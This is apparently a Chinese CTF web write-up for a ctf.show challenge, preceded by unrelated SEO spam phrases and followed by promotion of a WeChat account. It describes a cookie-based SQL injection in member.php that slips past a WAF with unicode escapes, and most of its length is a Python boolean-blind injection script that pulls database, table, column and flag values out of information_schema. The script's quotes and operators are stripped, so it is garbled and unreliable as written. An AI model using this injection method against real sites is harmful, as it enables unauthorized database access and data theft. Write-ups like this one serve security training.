如何建 网站,推广网站怎么做能增加咨询,购买网址,做网站为什么不要源代码0x00 前言
CTF 加解密合集CTF Web合集网络安全知识库溯源相关
文中工具皆可关注 皓月当空w 公众号 发送关键字 工具 获取
0x01 题目 0x02 Write Up
首先拿到题目#xff0c;先扫描一下#xff0c;发现一个www.zip 发现一个admin目录#xff0c;访问一下#xff1a; 在m…0x00 前言
CTF 加解密合集CTF Web合集网络安全知识库溯源相关
文中工具皆可关注 皓月当空w 公众号 发送关键字 工具 获取
0x01 题目 0x02 Write Up
首先拿到题目先扫描一下发现一个www.zip 发现一个admin目录访问一下 在member.php中发现一段代码这段代码中存在sql注入也就是在cookie中的sql注入 有一个要点是在代码中存在waf 这里有一个小知识就是json_decode可以识别unicode代码。那么我们可以将我们的测试poc改为unicode
true的话会返回一组 false会返回两组
以此为依据可以进行遍历
脚本用的是大佬写好的脚本
#encodingutf-8
import requestsurl http://f17498a1-535d-45db-8840-09657e3b6c78.challenge.ctf.show/admin/def tamper(payload):payload payload.lower()payload payload.replace(u, \\u0075)payload payload.replace(\, \\u0027)payload payload.replace(o, \\u006f)payload payload.replace(i, \\u0069)payload payload.replace(, \\u0022)payload payload.replace( , \\u0020)payload payload.replace(s, \\u0073)payload payload.replace(#, \\u0023)payload payload.replace(, \\u003e)payload payload.replace(, \\u003c)payload payload.replace(-, \\u002d)payload payload.replace(, \\u003d)payload payload.replace(f1a9, F1a9)payload payload.replace(f1, F1)return payload#get database length
def databaseName_len():print (start get database name length...)for l in range(0,45):payload 1 or (length(database()) str(l1) )#print(payload)payload tamper(payload)print(payload)tmpCookie islogin1;login_data{admin_user:%s,admin_pass:65} % payloadprint(tmpCookie)exit()headers {cookie: tmpCookie}r requests.get(url, headersheaders)myHeaders str(r.raw.headers)if ((myHeaders.count(login_data) 1)):print(get db length str(l).lower())break#get content
def get_databaseName():flag for j in range(0, 15):for c in range(0x20,0x7f):if chr(c) \ or chr(c) ; or chr(c) \\ or chr(c) :continueelse:payload 1 or (select (database()) between flag chr(c) and chr(126) )##print(payload)payload tamper(payload)tmpCookie islogin1;login_data{admin_user:%s,admin_pass:65} % payloadheaders {cookie: tmpCookie}r requests.get(url, headersheaders)myHeaders str(r.raw.headers)if ((myHeaders.count(login_data) 2)):flag chr(c - 1)print(databasename flag.lower())break#get content
def get_tableName():flag for j in range(0, 30): #blind injectfor c in range(0x20,0x7f):if chr(c) \ or chr(c) ; or chr(c) \\ or chr(c) :continueelse:payload 1 or (select (select table_name from information_schema.tables where table_schemadatabase() limit 3,1) between flag chr(c) and chr(126) )##print(payload)payload tamper(payload)tmpCookie islogin1;login_data{admin_user:%s,admin_pass:65} % payloadheaders {cookie: tmpCookie}r requests.get(url, headersheaders)myHeaders str(r.raw.headers)if ((myHeaders.count(login_data) 2)):flag chr(c - 1)print(tablename flag.lower())break#get content
def get_ColumnName():flag for j in range(0, 10): #blind injectfor c in range(0x20,0x7f):if chr(c) \ or chr(c) ; or chr(c) \\ or chr(c) :continueelse:payload 1 or (select (select column_name from information_schema.columns where table_nameFL2333G limit 0,1) between flag chr(c) and chr(126) )##print(payload)payload tamper(payload)tmpCookie islogin1;login_data{admin_user:%s,admin_pass:65} % payloadheaders {cookie: tmpCookie}r requests.get(url, headersheaders)myHeaders str(r.raw.headers)if ((myHeaders.count(login_data) 2)):flag chr(c - 1)print(column name flag.lower())break#get content
def get_value():flag for j in range(0, 50): #blind injectfor c in range(0x20,0x7f):if chr(c) \ or chr(c) ; or chr(c) \\ or chr(c) :continueelse:payload 1 or (select (select FLLLLLAG from FL2333G) between flag chr(c) and chr(126) )##print(payload)payload tamper(payload)tmpCookie islogin1;login_data{admin_user:%s,admin_pass:65} % payloadheaders {cookie: tmpCookie}r requests.get(url, headersheaders)myHeaders str(r.raw.headers)if ((myHeaders.count(login_data) 2)):flag chr(c - 1)print(flag flag.lower())breakprint (start database sql injection...)
# databaseName_len()
# get_databaseName()
# get_tableName()
# get_ColumnName()
get_value()0x03 other
欢迎大家关注我朋友的公众号 皓月当空w 分享漏洞情报以及各种学习资源技能树面试题等。
以上
